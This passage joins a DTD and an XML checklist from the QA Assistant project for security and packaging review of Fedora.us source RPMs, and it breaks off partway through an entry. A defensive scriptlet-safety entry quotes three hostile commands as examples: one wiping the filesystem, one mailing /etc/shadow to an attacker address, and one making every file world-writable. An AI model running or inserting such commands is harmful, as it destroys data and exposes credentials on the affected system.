=== BackupTheBerlios/qa-assistant-svn/qa-assistant/trunk/data/checklist.dtd
<?xml version='1.0' encoding='UTF-8'?>
<!ENTITY % Resolutions
  '(Needs-Reviewing|Pass|Fail|Non-Blocker|Not-Applicable)'
>
<!ENTITY % ChecklistType
  '(SRPM|generic)'
>
<!ENTITY % Boolean
  '(true|false)'
>
<!ELEMENT checklist (category+)>
  <!ATTLIST checklist
    version CDATA #FIXED '0.2'
    name CDATA #REQUIRED
    revision CDATA #REQUIRED
    type %ChecklistType; "generic"
  >
  <!ELEMENT category (description, entry+)>
    <!ATTLIST category
      name CDATA #REQUIRED
    >
    <!ELEMENT description (#PCDATA)>
    <!ELEMENT entry (states, description)>
      <!ATTLIST entry
        name CDATA #REQUIRED
	display %Boolean; "false"
      >
      <!ELEMENT states (state+)>
        <!ELEMENT state (#PCDATA)>
          <!ATTLIST state
            name %Resolutions; #REQUIRED
          >

=== BackupTheBerlios/qa-assistant-svn/qa-assistant/trunk/data/fedoraus.xml
<?xml version='1.0' ?>
<!DOCTYPE checklist PUBLIC "-//BadgerWare//DTD QA Assistant Checklist File 0.3//EN" "http://qa-assistant.sf.net/dtds/checklist/0.3/checklist.dtd">
<checklist version="0.3" name="Fedora.us SRPM QA" revision="0.3">
  <summary>Run QA on SRPMS according to the fedora.us rules</summary>
  <properties>
    <property name="ticketURL" type="url">
      <require type="optional"/>
    </property>
    <property name="SRPMfile" type="file">
      <require type="onload">
        <arg>ticketURL</arg>
        <function type="propset">srpm_from_ticket</function>
      </require>
    </property>
    <property name="SRPMMD5sum" type="md5sum">
      <require type="automatic">
        <arg>SRPMfile</arg>
        <function type="propset">srpm_md5</function>
      </require>
    </property>
    <property name="fileMD5s" type="string">
      <require type="automatic">
        <arg>SRPMfile</arg>
        <function type="propset">srpm_internal_md5s</function>
      </require>
    </property>
  </properties>
  <functions>
    <function type="header">srpm_header</function>
    <function type="user">from_srpm</function>
    <function type="user">from_ticket</function>
    <function type="user">separator</function>
    <function type="user">add_item</function>
    <function type="user">separator</function>
    <function type="user">publish</function>
    <function type="user">submit_ticket</function>
  </functions>
  <category name="Security of the build system">
    <description>Although many of the checklist items relate to security, the
      ones listed in this section are important to check before you proceed
      to the other checklist items.  These checks help to prevent compromise
      of your system by malicious code in the rpm spec file or the source
      tarball.  While not an absolute guarantee that there are no trojans
      waiting for you when you build and run the software, these checks help
      you verify that the source comes from a genuine project and gives you
      a clue as to where to start looking if intentional security bugs are
      found.</description>
    <entry name="SRPM GPG signed" display="true">
      <states>
        <state name="Pass">Package signature verified: [ID] [Name]</state>
        <state name="Fail">Missing or Bad GPG Signature</state>
      </states>
      <test>
        <argument>SRPMfile</argument>
        <code language="sh">
# If any of the following tests succeed we can exit with success
# Need to parse the commands to create a suitable output string
#fedora-rpmchecksig $1
#rpm --checksig $1
#tgpg $1
        </code>
      </test>
      <description>The SRPM must be signed by the packager.  This gives you
        an association to a gpg key which you can then use in tracking down
        who packaged the code.  It's even better if the gpg key is known to
        you or to other people you know as that gives you more reference
        points to a person's real identity.  Over time, as you see more and
        more packages signed by a person's GPG key, you'll have a history of
        good or poor packaging habits to think about when reviewing their
        packages.</description>
    </entry>
    <entry name='Canonical Source' display='true'>
      <states>
        <state name='Pass'>Source URL is canonical</state>
        <state name='Fail'>Specified Source URL is not canonical</state>
      </states>
      <description>You should check to be sure the Source and URL fields
        point to canonical sources for the software project.  This helps
        ensure that the person creating the RPM is not downloading a trojan
        source tarball from an unknown entity.  Using google to search for
        canonical home pages is one good way to verify this.</description>
    </entry>
    <entry name='Upstream source verified' display='true'>
      <states>
        <state name='Pass'>Upstream source tarball verified</state>
        <state name='Fail'>Upstream source tarball does not match!</state>
      </states>
      <description>You should always verify that the upstream source matches
        the source provided in the SRPM.  One technique is to download
        the pristine source from a known canonical web site and take the MD5
        hash of it with md5sum.  Comparing this hash to the hash of the
        source in the SRPM should be identical.  A second method is to
        download the SRPM for the same package/version from another
        distribution and compare the MD5 hashes of the Source tarball in
        that package with the hashes in the package you are reviewing.  This
        kind of redundant check helps insure that trojaned sources aren't
        being introduced to the package.</description>
    </entry>
    <entry name="Install time scriptlet safety">
      <states>
        <state name='Pass'>Install time scriptlets do not have obvious malicious code.</state>
        <state name='Fail'>Install time scriplet does unsafe things. [REVIEWER please add details]</state>
        <state name='Not-Applicable'>There are no install time scriptlets</state>
      </states>
      <description>The install time scriplets in the %pre, %post, %preun, and
        %postun are arbitrary shell scripts that are executed when the RPM
        package is installed or de-installed from the system.  Typically, the
        root user has to install and deinstall so these scripts execute as
        root.  It is very important that they are checked for flaws that might
        make the system more insecure or remove needed files from the
        filesystem.  Some examples are 'rm -rf /',
        'mail cracker@domain.com &lt; /etc/shadow', 'chmod -R a+rwX /'
      </description>
    </entry>
    <entry name='Upstream GPG Checked'>
      <states>
        <state name='Pass'>Good upstream GPG Signature</state>
        <state name='Fail'>Upstream GPG Signatures do not match</state>
        <state name='Not-Applicable'>No upstream GPG Signature</state>
      </states>
      <description>Whenever possible, you should check that the upstream tarball is
        truly from a trusted source.  One method of doing this is to have the
        upstream developers sign the release tarball with their gpg keys.
        Another, related method is for the upstream developer gpg sign a
        file with MD5sums of the source tarballs.  If the upstream developer
        uses either of these methods, please be sure to verify the source by
        checking the valdity of the gpg signatures.</description>
    </entry>
  </category>
  <category name="Specfile Scan">
    <description>You should always look over the spec file before attempting
      to rebuild a package.  After all, the spec file contains commands that
      will be executed on your machine with permission to access your files.
      If you don't check first, there's no telling what programs the package
      author may be trying to execute.</description>
    <entry name="Package Naming">
      <states>
        <state name='Pass'>Package name conforms to the Fedora Naming Guidelines</state>
        <state name='Fail'>Package needs to be renamed to meet the Fedora Naming Guidelines</state>
      </states>
      <description>The Fedora Package Naming Guidelines specify a way to
        name packages that is easy to understand, allows smooth upgrading
        between package releases, and minimizes package conflicts with
        future Fedora Core distribution upgrades.  Please see:
        http://videl.ics.hawaii.edu/pipermail/fedora-devel/2003-March/000715.html
        for the gory details.</description>
    </entry>
    <entry name="Install time scriptlet bugs">
      <states>
        <state name='Pass'>No bugs found in install time scriptlets</state>
        <state name='Fail'>Install time scriptlet bug! [REVIEWER: Please add details]</state>
        <state name='Non-Blocker'>Minor scriptlet bug [REVIEWER: Please add details]</state>
        <state name='Not-Applicable'>There are no install time scriptlets</state>
      </states>
      <description>%pre, %preun, %post, and %postun scripts are necessary to
        perform necessary prep work on a computer before software is installed
        on it and to continue setup after the package's files have been
        unpacked to the filesystem.  Leaving out these automated tasks is a
        common problem with binary packages.  Examples to watch for: if a
        package installs libraries (*.so.* files) into %{_libdir}, does the
        %post and %postun run /sbin/ldconfig?  If the package has *.info
        files, does %post use install-info to install?  Does %postun use
        'if [$1 = 0]; then install-info --delete [INFOFILE]; fi' (The 'if'
        statement makes uninstall only occur on package removal, not upgrade.)
        Please see the sample spec generated by fedora-newrpmspec for other
        things to watch out for.
      </description>
    </entry>
    <entry name='Epoch'>
      <states>
        <state name="Pass">Versioned dependencies use epoch properly</state>
        <state name="Fail">Versioned dependency used without proper epoch</state>
      </states>
      <description>When you create a package-version dependency in an RPM
        spec using "Requires:", "BuildRequires", "Provides", "Obsoletes",
        "Conflicts", or "BuildConflicts" you need to specify the Epoch along
        with the rest of the version (0 if none are explicitly specified on
        that package.)  This is because rpm is in the process of
        transitioning to making Epoch 0 when not specified but hasn't yet
        applied this completely.  So there are cases where package dependency
        information is broken without this explicit specification.  Example
        of a proper dependency with version information:
        BuildRequires: foobar &gt;= 0:1.0</description>
    </entry>
    <entry name="Group Tag">
      <states>
